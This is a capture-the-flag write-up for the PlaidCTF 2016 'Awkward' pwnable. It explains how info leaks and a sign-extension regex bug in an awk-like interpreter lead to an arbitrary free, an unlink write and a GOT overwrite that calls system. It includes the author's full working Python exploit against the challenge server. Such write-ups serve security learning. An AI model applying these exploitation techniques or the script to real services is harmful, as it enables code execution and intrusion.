PlaidCTF 2016 – Awkward [Pwnable 600]

Awkward was an exploitation challenge built around a fairly substantial “awk”-like interpreter containing a variety of different bugs.

I used IDA and Hex-Rays extensively to reverse it.

After a bit of reversing, I got it running simple programs like this:

START { }
FINISH { printf "%d", 1; }

Then, mostly by a lucky guess, I found the information leak vulnerability: printf failed to check argument types, which allowed leaking heap addresses with:

 printf "%x", "string";

And reading strings from arbitrary addresses with:

 printf "%s", 12345678;

This was all I had for probably 10 hours. I reversed most of the interpreter and the hash-map, and deeply investigated some weird behaviour around string splitting, field separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:

 "string"; x = y;

If y was an uninitialized variable, x would become the address of “string”.

Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. There, at last, I found the corruption bug: when parsing character sets ([abc] notation), the byte values were sign-extended before being used to set bits in a bitmap.

[Screenshot: Hex-Rays decompilation of the character-set parsing code]

(v24 is an int, from a sign-extended character)

This allowed setting bits before the start of the bitmap using bytes 0x80 to 0xFF, although only a handful of fields could be corrupted this way. Long story short, there was a “next” pointer field earlier in the structure which was initialised to NULL. I could write into it bit by bit, and as long as the character set was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).
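To make the sign-extension problem concrete, here is a minimal Python sketch. It only models how a byte turns into a bit index; the function names are hypothetical, and the "fixed" variant is simply the usual mask-to-unsigned remedy, not something taken from the challenge binary.

```python
import ctypes

def signed_index(ch):
    """Bit index as the buggy code computes it: the byte is treated as a signed char."""
    return ctypes.c_int8(ch).value

def fixed_index(ch):
    """Bit index with the byte masked to 0..255 first, which stays inside the bitmap."""
    return ch & 0xFF

# Every byte value whose sign-extended index points before the bitmap.
out_of_bounds = [ch for ch in range(256) if signed_index(ch) < 0]

for ch in (0x41, 0x7F, 0x80, 0xC0, 0xFF):
    print("byte 0x%02X: buggy bit index %4d, fixed bit index %3d"
          % (ch, signed_index(ch), fixed_index(ch)))
print("%d byte values index memory before the bitmap" % len(out_of_bounds))
```

Any byte with the top bit set becomes a negative index, which is why only the structure fields sitting just before the bitmap are reachable.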

I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in gdb, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it’s safer to just trust what you can see:

 # NOTE: 0xC0 -> 0x1
 # NOTE: 0xB9 -> 0x2
 # NOTE: 0xBA -> 0x4
 # NOTE: 0xBB -> 0x8
 # NOTE: 0xBC -> 0x10
 # NOTE: 0xBF -> 0x80
 # NOTE: 0xC8 -> 0x100
 # NOTE: 0xC1 -> 0x200
 # NOTE: 0xC2 -> 0x400
 # NOTE: 0xC7 -> 0x8000

I combined these notes into the following Python for setting an arbitrary address:

 target = 0x12345678
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 chrs = ''
 for i in range(0, 32):
     if target & (1 << i):
         chrs += chr(lookup[i])
 print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'
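For the curious, the observed table can be reproduced by a simple model. This is a sketch under assumptions that are not confirmed by the binary: the byte offset is computed with C-style truncating division (`c / 8`), the bit within the byte with `c & 7`, and the 32-bit “next” pointer sits 8 bytes before the bitmap. The names `pointer_bit` and `charset_for` are hypothetical.

```python
def pointer_bit(ch, next_offset=-8):
    """Return which bit of the 32-bit next pointer byte `ch` sets, or None."""
    value = ch - 256 if ch >= 0x80 else ch   # sign extension of a char
    byte_offset = int(value / 8)             # truncates toward zero, like C (assumed)
    bit = value & 7                          # bit within that byte (assumed)
    if next_offset <= byte_offset < next_offset + 4:
        return (byte_offset - next_offset) * 8 + bit
    return None

# Build the bit -> byte table from the model.
derived = [None] * 32
for ch in range(0x80, 0x100):
    bit = pointer_bit(ch)
    if bit is not None:
        derived[bit] = ch

# The table from the writeup, written so it also runs on Python 3.
lookup = ([0xC0] + list(range(0xB9, 0xC0)) + [0xC8] + list(range(0xC1, 0xC8)) +
          [0xD0] + list(range(0xC9, 0xD0)) + [0xD8] + list(range(0xD1, 0xD8)))

def charset_for(target):
    """Byte values to place inside [...] so the pointer becomes `target`."""
    return [lookup[i] for i in range(32) if target & (1 << i)]

print(derived == lookup)
print([hex(c) for c in charset_for(0x12345678)])
```

The odd ordering (0xC0 first, then 0xB9 to 0xBF) falls out of mixing truncating division with a bit mask: 0xB9 to 0xC0 all land in the same byte, but 0xC0 is the only one whose low three bits are zero.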

I spent a few hours poking around different options for what to confuse with a “next” node before realising that if the first byte is a safe value, the engine doesn’t crash and simply frees the provided address.

I spent longer pondering what I should free before deciding on the “fields” array (pretty much the only array the code can access). This is an array of char* that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?

[Figure: the fields array]

I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:

 str = "aaaabbbbccccddddeeeeffffgggghhhh";
 # duplicate the string and get its address a few times
 str; q = z;
 str; r = z;
 str; s = z;
 str; t = z;
 # reallocate fields array
 $128 = "1";
 # get one after it for reference
 str; u = z;
 # dump the addresses
 printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
 printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
 x = t + 112;
 printf "fields array: %x\n", x;
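The same arithmetic can be done on the Python side once the addresses have been printed. The sketch below is illustrative only: the sample addresses are made up, the helper names are hypothetical, and the two sanity checks (evenly spaced copies, and a larger gap before the last copy) are assumptions about what a healthy heap layout looks like here. The offset of 112 is the one used in the awk snippet.

```python
def parse_leaks(output):
    """Parse one hex address per line, as printed by printf "%x\\n"."""
    return [int(line, 16) for line in output.split()]

def locate_fields_array(leaks, offset=112):
    """leaks: addresses [q, r, s, t, u] of the string copies, in allocation order."""
    q, r, s, t, u = leaks
    strides = [r - q, s - r, t - s]
    # The copies made before the reallocation should be evenly spaced.
    if len(set(strides)) != 1:
        raise ValueError("copies are not evenly spaced: %r" % strides)
    # The copy made afterwards should sit past the new array (assumed check).
    if u - t <= strides[0]:
        raise ValueError("no gap between the last two copies")
    return t + offset

# Hypothetical output from the first printf in the snippet above.
sample = "9a0b008\n9a0b030\n9a0b058\n9a0b080\n9a0b300\n"
print(hex(locate_fields_array(parse_leaks(sample))))
```

If either check fails, the heap is probably not in the expected state and freeing the computed address would most likely just crash the target.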

I then rewrote my arbitrary-free to use awk to construct the regex:

 code = 's = "he[";\n'
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 for i in range(31, -1, -1):
     code += 'if (x >= ' + str(1<<i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1<<i) + '; }\n'
 code += 's = s "]";\n'
 code += 'print "hello" ~ s;\n'
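The generated awk code decomposes x by repeated comparison and subtraction from the highest power of two downwards, rather than with bitwise tests. A small Python simulation (a sketch with hypothetical function names) shows that this greedy loop selects exactly the same characters as testing each bit directly, as long as x fits in 32 bits:

```python
LOOKUP = ([0xC0] + list(range(0xB9, 0xC0)) + [0xC8] + list(range(0xC1, 0xC8)) +
          [0xD0] + list(range(0xC9, 0xD0)) + [0xD8] + list(range(0xD1, 0xD8)))

def awk_charset(x):
    """Mirror the generated if-chain: compare, append a byte, subtract."""
    chars = []
    for i in range(31, -1, -1):
        if x >= (1 << i):
            chars.append(LOOKUP[i])
            x -= 1 << i
    return chars, x  # x is the remainder, 0 when every bit was consumed

def bit_test_charset(x):
    """The direct approach used in the earlier Python version."""
    return [LOOKUP[i] for i in range(31, -1, -1) if x & (1 << i)]

for value in (0, 1, 0x12345678, 0xFFFFFFFF):
    chars, remainder = awk_charset(value)
    print(hex(value), chars == bit_test_charset(value), remainder)
```

Working from the top bit down matters: each subtraction leaves a value smaller than the power of two just tested, so every later comparison behaves like a bit test.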

So, this is enough to free the fields array, but I needed to turn it into an arbitrary write. I chose to use the linked list removal operation of the variable hashmap for this (a super awkward technique, as you’ll see).

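[Screenshot: decompiled listing of the variable hashmap insertion and unlinking code; the text below refers to lines 38 and 61 of this listing]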

Once the fields-array was freed, I declared a new variable to reallocate the variables hashmap into the freed memory (and I declared enough variables earlier to make sure that this would cross the 70% threshold on line 61).

Because I could leak the address of arbitrary string data I could construct some very complex structures in memory. I used this to create a fake hashmap_entry structure, with the name pointing to a real name string. I inserted this structure in the correct slot in the hashmap by writing into the fields array, then declared a real variable with the same name, running the unlinking code in the listing above.
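As a rough illustration of the fake entry, the sketch below packs eight 32-bit fields in the order used by generate_block in the full exploit and computes the bucket with the same multiply-by-1337 hash. The helper names, the example variable name and all addresses are hypothetical, and truncating the hash to 32 bits is an assumption about the target.

```python
import struct

ENTRY_FORMAT = "<8I"  # eight little-endian 32-bit fields, order as in generate_block

def bucket_for(name, buckets=64):
    """Hash as in do_hash, truncated to 32 bits (the truncation is assumed)."""
    h = 0
    for c in name:
        h = (ord(c) + 1337 * h) & 0xFFFFFFFF
    return h % buckets

def fake_entry(name_addr, next_addr, prev_addr, filler=0x41414141):
    """Fields: next_in_chain, prev_in_chain, next, prev, name, type, value, cache."""
    return struct.pack(ENTRY_FORMAT, next_addr, next_addr, next_addr, prev_addr,
                       name_addr, filler, filler, next_addr)

# Hypothetical addresses: a leaked name string, a scratch pointer, a write target.
blob = fake_entry(name_addr=0x09A0C010, next_addr=0x09A0D180, prev_addr=0x08052038)
print(len(blob), bucket_for("victim"))
```

Because 64 divides 2**32, the bucket index comes out the same whether or not the hash wraps at 32 bits, so that assumption does not affect which slot the entry belongs in. Note that the packed bytes also have to survive the transport: the full exploit rejects blocks containing a newline, a NUL byte or the field separator.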

I wanted to use the code on line 38 to write to an arbitrary address, but unfortunately the “next” address had to be a valid address as well. To solve this I leaked the address of a large string in memory, and chose offsets into the string to control the low byte of the address. This allowed an arbitrary pointer to be written by repeating the “unlinking” primitive four times (increasing the write address each time).
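The byte-at-a-time trick is easier to see in a small simulation. The sketch below models memory as a dictionary and assumes a conventional doubly linked unlink (`prev->next = next` and `next->prev = prev`) with next at offset 8 and prev at offset 12, matching the layout in generate_block; the mirrored second write is an assumption, though it would explain why next has to be a valid address. `Memory`, `unlink`, `write_dword` and the scratch address are hypothetical.

```python
import struct

NEXT_OFF, PREV_OFF = 8, 12  # field offsets inside an entry, per generate_block

class Memory:
    """Sparse byte-addressed memory, enough to watch the writes land."""
    def __init__(self):
        self.cells = {}

    def write32(self, addr, value):
        for i, b in enumerate(struct.pack("<I", value)):
            self.cells[addr + i] = b

    def read32(self, addr):
        raw = bytes(self.cells.get(addr + i, 0) for i in range(4))
        return struct.unpack("<I", raw)[0]

def unlink(mem, next_addr, prev_addr):
    mem.write32(prev_addr + NEXT_OFF, next_addr)  # prev->next = next
    mem.write32(next_addr + PREV_OFF, prev_addr)  # next->prev = prev (assumed)

def write_dword(mem, where, what, scratch_base):
    """Write `what` to `where` one byte at a time via four unlinks."""
    assert scratch_base & 0xFF == 0  # aligned, so the low byte is fully controlled
    for i in range(4):
        byte = (what >> (8 * i)) & 0xFF
        unlink(mem, scratch_base + byte, (where + i) - NEXT_OFF)

mem = Memory()
write_dword(mem, where=0x08052040, what=0xF75CB180, scratch_base=0x09A0D100)
print(hex(mem.read32(0x08052040)))
```

Each unlink stores a full pointer into the scratch string, but only its low byte survives at the target because the next write overlaps the upper three bytes. The last write leaves three junk bytes after the target, so whatever follows it in memory gets clobbered.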

I used the printf leak to read the address of strlen from the GOT, then added an offset to find the address of system (since my local libc was the same as the remote one), and used the unlinking technique to replace the GOT entry. strlen was called by printf when printing strings, so after the corruption I could get the flag by writing:

 printf "%s\n", "cat flag\n"; 
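One detail worth spelling out is how a "%s" leak can read binary data such as a GOT entry, given that it stops at the first NUL byte. The sketch below mirrors the read_at_least and read_dword helpers from the full exploit, but runs against a fake in-process memory so it can be tried standalone; `fake_leak`, `FAKE_BASE` and the sample pointer value are hypothetical, while the libc delta is the one hardcoded in the exploit.

```python
import struct

def read_at_least(leak_cstring, addr, n):
    """Read at least n bytes using a primitive that returns a NUL-terminated string."""
    data = b""
    while len(data) < n:
        # Each leak stops at a NUL, so add the NUL back and resume just past it.
        data += leak_cstring(addr + len(data)) + b"\0"
    return data

def read_dword(leak_cstring, addr):
    return struct.unpack_from("<I", read_at_least(leak_cstring, addr, 4))[0]

# Fake target memory holding a pointer with an embedded zero byte.
FAKE_BASE = 0x1000
FAKE_MEMORY = struct.pack("<I", 0xF7600090) + b"\0" * 8

def fake_leak(addr):
    start = addr - FAKE_BASE
    end = FAKE_MEMORY.index(b"\0", start)
    return FAKE_MEMORY[start:end]

strlen_addr = read_dword(fake_leak, FAKE_BASE)
LIBC_DELTA = 0xF759B180 - 0xF75E13C0  # system minus strlen, as hardcoded in the exploit
system_addr = (strlen_addr + LIBC_DELTA) & 0xFFFFFFFF
print(hex(strlen_addr), hex(system_addr))
```

The delta only holds if the remote libc matches the one it was measured on, which is the assumption the writeup relies on.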

Full Code

The full code for my exploit (in all of its hasty awkward messiness) is listed below. It has a few more tricks that hopefully don’t need too much explanation. I’m afraid I used a rather inappropriate variable name (after 20 hours of hitting my head against this problem I was a bit frustrated), and then hardcoded the hash value making it too error-prone to change after the fact. Sorry.

import socket
import struct
import random
import string
import time
import sys

ADDRESS = ('192.168.46.138', 10241)
ADDRESS = ('awkward.pwning.xxx', 2323)
VERBOSE = True
VERBOSE = False

sock = socket.create_connection(ADDRESS)
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '<', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
            sys.stdout.write(repr(b)[1:-1])
            if b == '\n':
                sys.stdout.write('\n')
            sys.stdout.flush()
        s += b
    return s

def send(s):
    if VERBOSE:
        print '>', `s`
    sock.sendall(s)

program = '''
BEGIN { }
{
    FS = "xyz";
    if ( $1 == "r" ) { printf ">>>%s<<<\n", 0 + $2; }
    if ( $1 == "a" ) { printf ">>>%d<<<\n", $2; }
    if ( $1 == "s" ) { saved0 = $2; saved1 = $3; saved2 = $4; saved3 = $5; }
    if ( $1 == "l" )
    {'''
for i in range(5):
    program += "padding%d = \"0\";" % i;
program += '''
        str = "aaaabbbbccccddddeeeeffffgggghhhh";
        str; q = z;
        str; r = z;
        str; s = z;
        str; t = z;
        $128 = "1";
        str; u = z;

        print q;
        printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
        printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;

        x = t + 112;
        #x = 305419896;
        printf "freeing %x\n", x;

        s = "he[";
'''
lookup = [0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) + [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8)
for i in range(31, -1, -1):
    program += 'if (x >= ' + str(1 << i) + ') { s = s "' + chr(lookup[i]) + '"; x -= ' + str(1 << i) + '; }\n'
program += '''
        s = s "]";
        print x;
        print s;
        print "hello" ~ s;
        realloc = 1;
        $50 = saved0;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved1;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved2;
        print "alive";
        fuck = 1;
        print "alive?";

        $50 = saved3;
        print "alive";
        fuck = 1;
        print "alive?";

        printf "%s\n", "cat flag\n"; 
        print "alive??";
    }
}
FINISH { }
'''

#0xf75cb180 <system
#0xf7607690 <strlen

read_until('Program?')
send(program)
read_until('Ready.')


def read_address_string(a):
    send("rxyz%d\n" % (a,))
    read_until('>>>')
    return read_until('<<<')[:-3]

def get_address_of_string(a):
    assert ' ' not in a and '\n' not in a
    send("axyz%s\n" % (a,))
    read_until('>>>')
    return int(read_until('<<<')[:-3])

def read_at_least(a, n):
    r = ''
    while len(r) < n:
        r += read_address_string(a + len(r)) + '\0'
    return r

def read_dword(a):
    return struct.unpack_from('I', read_at_least(a, 4))[0]

strlen_got = 0x8052040
strlen = read_dword(strlen_got)

system = strlen + (0xf759b180-0xf75e13c0)
print hex(strlen)

junk_string = 'a' * 1024

scratch_start = get_address_of_string(junk_string)

name = get_address_of_string('fuck')
def generate_block(write_to, byte):
    target = (scratch_start + 256) & ~0xFF
    next_in_chain = prev_in_chain = next_ = prev = cache = target + byte
    type_ = 0x41414141
    value = 0x41414141

    next_offset = 0x8
    prev = write_to - next_offset


    print map(hex, (next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache))
    return struct.pack('IIIIIIII', next_in_chain, prev_in_chain, next_, prev, name, type_, value, cache);

def do_hash(name):
    h = 0
    for i in name:
        h = ord(i) + 1337 * h
    return h

def save(a,b,c,d):
    for s in (a,b,c,d):
        assert '\n' not in s, `s`
        assert 'xyz' not in s, `s`
        assert '\0' not in s, `s`
    send("sxyz%sxyz%sxyz%sxyz%s\n" % (a,b,c,d))

print do_hash('fuck') % 64

save(
    generate_block(strlen_got, (system & 0xFF)),
    generate_block(strlen_got+1, ((system >> 8) & 0xFF)),
    generate_block(strlen_got+2, ((system >> 16) & 0xFF)),
    generate_block(strlen_got+3, ((system >> 24) & 0xFF)),
    )
raw_input('attach?') # ps aux | grep ' ./awkw' | grep -v grep | cut -c10-15
send('lxyzaxyzb\n')
VERBOSE = True
read_until('xxxxx')

 
